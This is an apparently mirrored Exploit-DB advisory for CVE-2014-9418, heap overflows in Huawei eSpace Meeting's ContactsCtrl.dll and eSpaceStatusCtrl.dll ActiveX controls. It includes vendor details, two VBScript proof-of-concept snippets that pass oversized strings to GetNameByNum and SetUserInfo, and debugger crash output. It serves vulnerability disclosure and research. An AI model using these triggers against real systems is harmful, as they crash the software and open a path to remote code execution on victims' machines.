bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/windows/dos/46868.txt
Offensive Security 44198f828c DB: 2019-05-21 
16 changes to exploits/shellcodes

Huawei eSpace Meeting 1.1.11.103 - 'cenwpoll.dll' SEH Buffer Overflow (Unicode)
Huawei eSpace 1.1.11.103 - Image File Format Handling Buffer Overflow
Huawei eSpace 1.1.11.103 - 'ContactsCtrl.dll' / 'eSpaceStatusCtrl.dll' ActiveX Heap Overflow
Encrypt PDF 2.3 - Denial of Service (PoC)
PCL Converter 2.7 - Denial of Service (PoC)
docPrint Pro 8.0 - Denial of Service (PoC)
AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)
BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)
BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)

xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)
xorg-x11-server < 1.20.3 (Solaris 11) - 'inittab Local Privilege Escalation
Huawei eSpace 1.1.11.103 - DLL Hijacking
Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation
Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)
Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)

GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)

eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution

Linux x86_64 - Delete File Shellcode (28 bytes)
2019-05-21 05:02:05 +00:00

85 lines
No EOL
3.5 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

Huawei eSpace Meeting ContactsCtrl.dll and eSpaceStatusCtrl.dll ActiveX Heap Overflow
Vendor: Huawei Technologies Co., Ltd.
Product web page: https://www.huawei.com
Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)
eSpace UC V200R002C02
Summary: Create more convenient Enhanced Communications (EC) services for your
enterprise with this suite of products. Huaweis EC Suite (ECS) solution combines
voice, data, video, and service streams, and provides users with easy and secure
access to their service platform from any device, in any place, at any time. The
eSpace Meeting allows you to join meetings that support voice, data, and video
functions using the PC client, the tablet client, or an IP phone, or in a meeting
room with an MT deployed.
Desc: eSpace Meeting suffers from a heap-based memory overflow vulnerability when parsing
large amount of bytes to the 'strNum' string parameter in GetNameyNum() in 'ContactsCtrl.dll'
and 'strName' string parameter in SetUserInfo() in eSpaceStatusCtrl.dll library, resulting
in heap memory corruption. An attacker can gain access to the system of the affected node
and execute arbitrary code.
Vuln ActiveX controls:
C:\Program Files\eSpace-ecs\ContactsCtrl.dll
C:\Program Files\eSpace-ecs\eSpaceStatusCtrl.dll
Tested on: Microsoft Windows 7 Professional
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
23.09.2014
Patched version: V200R001C03
Vuln ID: HWPSIRT-2014-1157
CVE ID: CVE-2014-9418
Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589
--
ContactsCtrl.dll PoC and debug output:
<object classid='clsid:B53B93C2-6B0D-4D30-B46D-12F64E809B6D' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\eSpace-ecs\ContactsCtrl.dll"
prototype = "Function GetNameByNum ( ByVal strNum As String ) As String"
memberName = "GetNameByNum"
progid = "ContactsCtrlLib.ContactWnd"
argCount = 1
arg1=String(616400, "A")
target.GetNameByNum arg1
0:000> d esi
04170024 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
04170034 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
04170044 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
04170054 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
04170064 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
04170074 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
04170084 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
04170094 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
eSpaceStatusCtrl.dll PoC and debug output:
<object classid='clsid:93A44D3B-7CED-454F-BBB4-EE0AA340BB78' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\eSpace-ecs\eSpaceStatusCtrl.dll"
prototype = "Sub SetUserInfo ( ByVal strAccount As String , ByVal staffNo As String , ByVal strName As String , ByVal status As Long )"
memberName = "SetUserInfo"
progid = "eSpaceStatusCtrlLib.StatusCtrl"
argCount = 4
arg1="defaultV"
arg2="defaultV"
arg3=String(14356, "A")
arg4=1
target.SetUserInfo arg1 ,arg2 ,arg3 ,arg4
0:005> r
eax=feeefeee ebx=02813550 ecx=feeefeee edx=feeefeee esi=0281369c edi=02813698
eip=776def10 esp=029dfd60 ebp=029dfd74 iopl=0 nv up ei ng nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010293
ntdll!RtlEnterCriticalSection+0x4a:
776def10 83790800 cmp dword ptr [ecx+8],0 ds:0023:feeefef6=????????
Reference in a new issue View git blame Copy permalink